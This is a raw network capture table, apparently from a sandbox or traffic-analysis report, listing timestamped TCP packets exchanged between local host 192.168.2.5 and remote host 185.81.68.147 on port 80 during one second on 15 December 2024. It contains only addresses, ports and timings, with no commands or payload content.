                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.248388052 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.248997927 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.249371052 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.249464035 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.250252008 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.250443935 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.250535965 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.250888109 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.250979900 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.251074076 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.251971960 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.252132893 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.252227068 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.253144979 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.253349066 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.253441095 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.254321098 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.254435062 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.254529953 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.255609035 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.255620003 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.255738020 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.256613970 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.437040091 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.437074900 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.437191963 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.438123941 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.438214064 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.438633919 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.439374924 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.439429045 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.440547943 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.440623999 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.440692902 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.440692902 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.441612959 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.441740990 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.441838980 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.442739964 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.443089962 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.443182945 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.444046021 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.444077969 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.444183111 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.445183992 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.445286036 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.445848942 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.446352959 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.446387053 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.446485996 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.447561979 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.447594881 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.447690964 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.451162100 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.451194048 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.451229095 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.451261997 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.451308966 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.451345921 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.451345921 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.451380968 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.451488018 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.453099966 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.453134060 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.453224897 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.454252958 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.454293013 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.454408884 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.455125093 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.455157995 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.455250025 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.456187963 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.456540108 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.456639051 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.457389116 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.457597017 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.458688974 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.458805084 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.458883047 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.458914042 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.459763050 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.460196972 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.460335016 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.460905075 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.461090088 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.462150097 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.462249994 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.462321997 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.462450981 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.463260889 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.463388920 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.463515043 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.464462042 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.464688063 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.465540886 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.465630054 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.465884924 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.466017962 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.466664076 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.466993093 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.467890024 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.467993021 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.468074083 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.468205929 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.468991041 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.469115019 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.469250917 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.470165968 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.470635891 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.471404076 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.471512079 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.471601009 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.471734047 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.472647905 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.472681046 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.472790956 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.473735094 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.473908901 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.474020958 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.474957943 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.474992037 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.655134916 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.656074047 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.656205893 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.657283068 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.657386065 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.657407999 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.657447100 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.658440113 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.658562899 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.659567118 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.659663916 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.659732103 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.659848928 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.660808086 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.660825014 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.660947084 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.662545919 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.662643909 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.662774086 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.663022995 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.663131952 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.664175034 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.664272070 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.664329052 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.664474010 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.665342093 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.665514946 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.666487932 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.666588068 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.666603088 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.666642904 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.667670012 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.667784929 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.669044971 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.669081926 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.669168949 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.669203043 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.669975996 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.670085907 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.670213938 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.671175957 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.671269894 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.671387911 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.672297955 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.672426939 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.673507929 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.673602104 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.673656940 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.673768997 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.674634933 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.674740076 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.674869061 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.675892115 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.723778963 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.807370901 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.807478905 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.807642937 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.807876110 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.808029890 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.809048891 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.809129000 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.809199095 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.809295893 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.810223103 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.810317039 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.811352968 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.811436892 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.811446905 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.811501026 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.812510014 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.812612057 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.812834024 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.813673019 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.813791990 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.814827919 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.814939976 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.814944029 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.814986944 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.816028118 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.816138983 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.816677094 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.817182064 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.817281008 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.817663908 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.818325996 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.818439007 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.818552017 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.819529057 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.819618940 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.820631027 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.820729971 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.820755005 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.821789980 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.821896076 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.821923971 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.821955919 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.822938919 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:12.823020935 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.003848076 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.003897905 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.005047083 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.005117893 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.005209923 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.006297112 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.006347895 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.006373882 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.007261992 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.007353067 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.007395983 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.008426905 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.008568048 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.008604050 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.009598017 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.009670973 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.009742022 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.010776043 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.010848999 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.010922909 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.011908054 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.012037039 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.012142897 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.013108015 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.013199091 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.013308048 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.014214993 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.014309883 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.014344931 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.015424967 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.015496969 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.015515089 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.016544104 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.016618967 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.016732931 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.017760038 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.017827988 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.017853022 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.018897057 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.019011021 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.019108057 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.020154953 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.020190001 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.020226955 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.021212101 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.021281004 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.021332026 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.022584915 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.022656918 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.022763968 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.023530006 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.023600101 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.023679972 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.024683952 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.024755955 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.024837971 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.025860071 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:13.026026964 CET8049708185.81.68.147192.168.2.5
